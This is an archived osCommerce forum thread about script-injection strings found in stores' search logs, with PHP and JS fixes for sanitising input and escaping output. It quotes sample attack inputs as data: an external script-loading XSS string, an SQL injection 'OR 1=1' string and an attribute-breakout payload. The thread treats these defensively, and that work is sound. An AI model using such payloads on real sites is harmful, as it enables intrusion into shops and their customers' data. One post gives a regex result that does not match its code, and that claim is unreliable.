ArtcoInc Posted May 18, 2019

@puggybelle I had an attack on one of my sites yesterday ... I also have a Keyword Search Report on this site. I hadn't checked it in a while, but after reading your post, I went to check it out. Guess what? Same thing here ... That's just part of one page! There are over 20 pages of this! Thank you for reporting this ... I wouldn't have thought to look at this. Malcolm
Guest Posted May 19, 2019

2 hours ago, ArtcoInc said: Thank you for reporting this ... I wouldn't have thought to look at this.

What did you check in your database? I really didn't know what else to look at, other than make sure the 'search_queries' table was empty after deleting the report. Then, of course, I put the maxlength limit on the search field here, there and everywhere. Now I'm thinking it should be even shorter than what I assigned. My keyword report resembled yours. I had one entry, though, that was probably eight lines of code alone. Should I check anything else? This stuff always shakes me up. - Andrea
pete2007 Posted May 19, 2019

Is there any way we can turn off the search queries being saved to our databases?
♥JcMagpie Posted May 19, 2019

1 hour ago, pete2007 said: Is there any way we can turn off the search queries being saved to our databases?

It's not just search: any form on your website that allows the visitor to enter text that is saved to your database is a backdoor for hackers. Search is easy, just remove osC search and replace it with Google search (nothing is saved on your db by this), or limit text input to just one or two words. All forms should have some sort of captcha and text cleanser built in to prevent saving scripts to the db. Reviews is another one that is targeted by hackers.
pete2007 Posted May 19, 2019

29 minutes ago, JcMagpie said: It's not just search, any form on your website that allows the visitor to enter text that is saved to your database is a backdoor for hackers. Search is easy, just remove osC search and replace it with google search nothing saved on your db by this, or limit text input to just on or 2 words. All forms should have some sort of captcha and text cleanser built in to prevent saving scripts to db. Reviews is another one that is targeted by hackers.

Thank you for your reply, whereabouts can I limit the text for the search?
♥JcMagpie Posted May 19, 2019

As the input field is controlled by the function in html_output.php, we cannot control it directly. So in the template file of the search simply add a bit of js to limit input.

```html
<script>
// Sets maxlength on every <input> on the page, not only the search box;
// use a more specific selector if other inputs need a longer limit.
$("input").attr("maxlength", 20);
</script>
```

You should let your customers know a limit is set.
Jack_mcs Posted May 19, 2019

@ArtcoInc The r87 dot com is a site on godaddy. You could report it as a spammer and/or block its IP's. Although the whois for it lists quite a few similar names so I suspect this guy wouldn't be easily stopped.

13 hours ago, puggybelle said: Should I check anything else? This stuff always shakes me up.

Limiting the search string probably won't make a difference since they can type directly into the url. Many times the hackers will enter some invalid command so that an error is displayed that gives them more details about the database. You can test your site here to see if that is the case. Also be sure that anything entered in the search does not show up on the page after the search. This doesn't occur with the CE version but might with older versions. If your search doesn't require any special characters, then I suggest you change this code in the advanced_search_result.php file

```php
if (isset($_GET['keywords'])) {
  $keywords = tep_db_prepare_input($_GET['keywords']);
}
```

to this

```php
if (isset($_GET['keywords'])) {
  // \w matches letters, digits and underscore; everything else, including
  // spaces, quotes and apostrophes, is stripped before the value is used.
  $keywords = preg_replace('/[^\w]/', '', $_GET['keywords']);
  $keywords = tep_db_prepare_input($keywords);
}
```

That will remove everything from the search string other than letters and numbers.
ArtcoInc Posted May 19, 2019

@pete2007 11 hours ago, pete2007 said: Is there any way we can turn off the search queries being saved to our databases?

Out of the box, osC does not save search queries in the database. I'm using an add-on called SmartSuggest that, amongst other things, creates a new database table and saves the search queries. I find this important since I can now see what people are searching for, and use that information to either adjust the text on my site, or adjust my product lines (if I sell apples, and people are searching for oranges ... ). M
♥JcMagpie Posted May 19, 2019

A simple string scrubbing function using https://www.php.net/manual/en/function.preg-replace.php

```php
<?php
function ScrubInput($input) {
    // allow only letters
    //$scrub = preg_replace("/[^a-zA-Z]/", "", $input);
    // allow only letters and numbers
    //$scrub = preg_replace("/[^a-zA-Z0-9]/", "", $input);
    // allow only letters, numbers, and whitespace
    $scrub = preg_replace("/[^a-zA-Z0-9\s]/", "", $input);
    // Let's get rid of all CAPS
    $scrub = strtolower($scrub);
    // limit input to 40 chars
    $scrub = substr($scrub, 0, 40);
    return $scrub;
}

// test the function
echo ScrubInput("iaja this 1237412~! is @#$%^&*() how -=+_] it [{};:/ works .,>?OKAMNBVCXZLKJHG'\"");
```

Result: iaja this 1237412 is how it works ok
greasemonkey Posted May 19, 2019

As a suggestion for a different smart search that doesn't write to your DB... try this one (I've been using it for a couple years... works great). https://apps.oscommerce.com/Redirect=9351
ArtcoInc Posted May 19, 2019

@greasemonkey (while off topic regarding hack attempts ...) I also reviewed that search add-on here ... M
greasemonkey Posted May 19, 2019

@ArtcoInc I think the link to your review is very relevant to the thread - and the threat of this hack attempt (I can't recall the level of detail in your review but maybe you'd update to include this potential risk).
Guest Posted May 19, 2019

@Jack_mcs @JcMagpie Any way to keep apostrophes, quotation marks, dashes, letters and numbers? LOL. My buyers really need to use quotation marks in some circumstances, in order to find the exact name or phrase. When the edits are made, you can't even find the test product A Bug's Life unless you leave out the apostrophe. Smart buyers are going to include the apostrophe...get no search results...and leave. These edits are only making search more difficult. And after viewing my keywords search report for months now....buyers need all the help they can get! Is there a way to sanitize against the inclusion of weird characters that always accompany a malicious code string, but preserve the other ones I mentioned? - Andrea
MrPhil Posted May 19, 2019

It will depend on your osCommerce version, and what add-ons you have that put stuff to database, but any decent DB code should disable (usually escape, not removal) any special characters that might be interpreted as database commands. That way, the string content can't be used to run commands, but it still might interfere with searches. For example, escaping an apostrophe so that it can't be used to end a field and add SQL commands (change it to a literal apostrophe, not a delimiter for SQL commands), might prevent searching for "A Bug's Life", but I'm not sure in this code. I haven't looked lately, but there may be ways around that problem.
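To make the escape-versus-strip point above concrete, here is an added example written for this thread; it is not code from osCommerce or from any poster. It uses PDO with an in-memory SQLite table standing in for the products table (the table, its rows and the function names are constructed for the demo, and the pdo_sqlite and mbstring extensions are assumed). A bound parameter treats the apostrophe in "A Bug's Life" as data, so the product stays searchable while an injection string becomes an inert pattern, and the length cap is applied on the server because a client-side maxlength is bypassed by editing the URL.

```php
<?php
// Added example for this thread, not osCommerce code. It uses an in-memory
// SQLite database through PDO so it runs offline; the products table, its rows
// and the function names are constructed for the demo.

function make_demo_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE products (products_id INTEGER PRIMARY KEY, products_name TEXT)');
    $ins = $db->prepare('INSERT INTO products (products_name) VALUES (?)');
    foreach (["A Bug's Life", 'Toy Story', 'Cars'] as $name) {
        $ins->execute([$name]);
    }
    return $db;
}

// Vulnerable form: the keyword is concatenated into the SQL text, so an
// apostrophe ends the string literal. Shown only as the "before".
function search_unsafe(PDO $db, string $keywords): array {
    $sql = "SELECT products_name FROM products WHERE products_name LIKE '%" . $keywords . "%'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened form. The length cap is enforced here, server side, because a
// client-side maxlength is bypassed by editing the URL. The keyword is then
// bound as a parameter: the apostrophe is data, not SQL, so "A Bug's Life"
// stays searchable. The LIKE wildcards % and _ are escaped so a visitor cannot
// turn the search into a match-everything pattern.
function search_safe(PDO $db, string $keywords, int $max_len = 40): array {
    $keywords = mb_substr(trim($keywords), 0, $max_len);
    if ($keywords === '') {
        return [];
    }
    $pattern = '%' . addcslashes($keywords, '%_\\') . '%';
    $stmt = $db->prepare(
        "SELECT products_name FROM products WHERE products_name LIKE :kw ESCAPE '\\'"
    );
    $stmt->execute([':kw' => $pattern]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$db = make_demo_db();

// A legitimate search containing an apostrophe: the bound parameter finds the
// product; the concatenated query is a syntax error.
print_r(search_safe($db, "Bug's"));
try {
    search_unsafe($db, "Bug's");
} catch (PDOException $e) {
    echo "unsafe search with apostrophe failed: " . $e->getMessage() . "\n";
}

// An injection attempt. Bound, it is a literal pattern that matches nothing.
// Concatenated, the -- comments out the closing quote and the WHERE clause
// becomes LIKE '%x' OR 1=1, which returns every row.
$payload = "x' OR 1=1 --";
print_r(search_safe($db, $payload));
print_r(search_unsafe($db, $payload));
```

Run it with `php search_demo.php`. The point of the two calls at the end is the contrast: the same user input is harmless as a bound parameter and takes over the query when concatenated, and no character had to be stripped to get there, so the apostrophe problem from the post above does not arise at the database layer.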
♥JcMagpie Posted May 19, 2019

Just put the chars you want to not remove in the [] and you'll be fine, see I have added ' and - after the 9

```php
// allow letters, numbers, apostrophe, hyphen and space; the hyphen is escaped
// so it is a literal (unescaped between ' and \w it forms a range, which
// PCRE2 rejects as an invalid range)
$scrub = preg_replace("/[^a-zA-Z0-9'\-\w\ ]/", "", $input);
```

this will give Result: iaja'-'- this 1237412 is @^*() how -=+_ from

```php
echo ScrubInput("iaja'-'- this 1237412~! is @#$%^&*() how -=+_] it [{};:/ works .,>?OKAMNBVCXZLKJHG'\"");
```

Please check before using on live site. Only tested in sandbox.
Jack_mcs Posted May 20, 2019

6 hours ago, puggybelle said: Any way to keep apostrophes, quotation marks, dashes, letters and numbers? LOL.

For the code I posted, use

```php
// keep space, letters, digits, underscore, apostrophe, double quote and hyphen;
// the hyphen goes last in the class so it is a literal rather than a range
$keywords = preg_replace('/[^ \w\'"-]/', '', $_GET['keywords']);
```
♥JcMagpie Posted May 20, 2019

14 hours ago, puggybelle said: When the edits are made, you can't even find the test product A Bug's Life unless you leave out the apostrophe.

I don't think this has anything to do with the edits, as on a stock osC you still will get no results! Try yourself on a clean BS4 install https://www.jcmagpie.com/advanced_search_result.php?keywords=A+Bugs+Life Compare that to a Google search box output and you get a result every time, try it yourself. https://www.justfastfood.com/
♥JcMagpie Posted May 20, 2019

Just checked on official osC and it's the same result, nothing found. Can you spot the irony of the image below?
MrPhil Posted May 20, 2019

Well, you could always replace your osC search with Google (with the term site:yoursite.com) or some other well-known search engine. (Are there any others left these days?) You will likely lose any storage of search terms, although there's no reason you couldn't save a search string (suitably sanitized, first) in your database before passing it on to Google. I'm assuming that there is no problem with sessions, etc. if you pop out to an external search engine from a logged-in store, so check out that early in the process.
♥JcMagpie Posted May 20, 2019

On 1/8/2019 at 6:00 PM, puggybelle said: Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC

So going back to the original post of what if someone uses a form to inject script into the db? Looks like no cleaning is done before input is saved to db in official osC or CE. Script used in create account form is simply passed over to each page and saved into db. No scrubbing is done when it is pulled out to display, and db is just taking the data presented to it. The test script used was the one originally posted and used as a test (can do no harm as it's not active on its own): Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC

So looks like some method of scrubbing all forms and input boxes is needed, not just the search. Or have I missed something?
♥raiwa Posted May 20, 2019

Malicious/problematic code has already been filtered out in this example: Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC 244 Whatever St"__sCRiPt sRC=//jb.gy/i__/sCrIpT_
greasemonkey Posted May 20, 2019

@raiwa is this cleaned by tep_draw_input_field (which is sanitizing with stripslashes)? And if so... is it enough? This is definitely out of my skill range - it really is just a question. Reading about SQL injections (again I'm not sure I understand it clearly) should we not be using PDO (as in 2.4) or at minimum htmlspecialchars? Source: https://stackoverflow.com/questions/29678806/secure-all-inputs-in-php-form
puddlec Posted May 20, 2019

How would it handle stuff like <script src="google.com"> and <script src="google.com">
♥JcMagpie Posted May 20, 2019

Both blocked by server with 403 error page.
♥raiwa Posted May 20, 2019

45 minutes ago, greasemonkey said: @raiwa is this cleaned by tep_draw_input_field (which is sanitizing with stripslashes)? And if so... is it enough? This is definitely out of my skill range - it really is just a question. Reading about SQL injections (again I'm not sure I understand it clearly) should we not be using PDO (as in 2.4) or at minimum htmlspecialchars? Source: https://stackoverflow.com/questions/29678806/secure-all-inputs-in-php-form

I guess this input example has been cleaned with tep_db_prepare_input:

```php
function tep_db_prepare_input($string) {
  if (is_string($string)) {
    return trim(tep_sanitize_string(stripslashes($string)));
  } elseif (is_array($string)) {
    foreach ($string as $key => $value) {
      $string[$key] = tep_db_prepare_input($value);
    }
    return $string;
  } else {
    return $string;
  }
}
```

which uses tep_sanitize_string:

```php
function tep_sanitize_string($string) {
  // collapse runs of spaces, and replace every < and > with _
  $patterns = array('/ +/', '/[<>]/');
  $replace  = array(' ', '_');
  return preg_replace($patterns, $replace, trim($string));
}
```

Whether it is enough, I do not know either.
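To answer the "is it enough" question above with something you can run, here is an added example for this thread. The two tep_ functions are copied from raiwa's post; the html_escape helper, the template fragment and the three inputs are constructed for the demo and are not osCommerce code (whether a particular osC template escapes on output is something to check per template, so the "unsafe" line assumes one that does not). The first input is reconstructed from the sanitized value quoted in the thread, reading each `_` as a `<` or `>`; the second is puddlec's tag; the third contains no angle brackets at all, which is the case tep_sanitize_string does nothing about.

```php
<?php
// Added example for this thread. The two tep_ functions are copied from raiwa's
// post above; everything else is constructed for the demo and is not
// osCommerce code. It shows what tep_db_prepare_input() does to three inputs
// and why escaping at output time is still required.

function tep_sanitize_string($string) {
    $patterns = array('/ +/', '/[<>]/');
    $replace  = array(' ', '_');
    return preg_replace($patterns, $replace, trim($string));
}

function tep_db_prepare_input($string) {
    if (is_string($string)) {
        return trim(tep_sanitize_string(stripslashes($string)));
    } elseif (is_array($string)) {
        foreach ($string as $key => $value) {
            $string[$key] = tep_db_prepare_input($value);
        }
        return $string;
    }
    return $string;
}

// Output-side escaping for an HTML attribute or text node. ENT_QUOTES covers
// both quote characters, so a stored value cannot close a value="..." attribute.
function html_escape(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs. The first is reconstructed from the sanitized value
// quoted in the thread (each _ there was a < or >); the second is puddlec's
// tag; the third has no angle brackets at all.
$inputs = [
    'thread payload'     => 'Bob Smith"><sCRiPt sRC=//jb.gy/i></sCrIpT>',
    'puddlec tag'        => '<script src="google.com">',
    'attribute breakout' => '" autofocus onfocus="alert(1)',
];

foreach ($inputs as $label => $raw) {
    // What tep_db_prepare_input() hands to the database: < and > become _,
    // runs of spaces collapse, but quotes and everything else pass through.
    $stored = tep_db_prepare_input($raw);

    // A template (assumed, not a specific osC file) that echoes the stored
    // value into an attribute unescaped: the first two inputs are defanged by
    // the underscores, the third is not, because it never needed a tag.
    $unsafe = '<input type="text" name="firstname" value="' . $stored . '">';

    // The same template escaping on output: all three are inert.
    $safe = '<input type="text" name="firstname" value="' . html_escape($stored) . '">';

    echo "$label\n  stored: $stored\n  unsafe: $unsafe\n  safe:   $safe\n\n";
}
```

Run with `php sanitize_demo.php` and compare the three "unsafe" lines: the first reproduces the `Bob Smith"__sCRiPt sRC=//jb.gy/i__/sCrIpT_` value seen in the thread, which is exactly why that payload did nothing, while the third input closes the attribute and adds an event handler without using a single `<` or `>`. Replacing angle brackets on the way in blocks one shape of payload; htmlspecialchars at the point of output is what blocks the class, and prepared statements (as discussed above) are what protect the database side, so the two are complementary rather than alternatives.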
Archived
This topic is now archived and is closed to further replies.